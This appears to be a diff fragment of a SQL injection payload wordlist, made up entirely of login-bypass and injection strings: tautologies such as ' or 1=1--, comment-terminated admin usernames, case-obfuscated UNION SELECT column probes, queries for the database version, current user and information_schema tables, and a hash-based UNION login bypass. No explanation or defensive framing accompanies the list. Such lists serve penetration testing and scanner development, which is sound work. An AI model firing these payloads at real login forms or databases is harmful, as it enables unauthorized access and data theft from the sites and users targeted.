|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
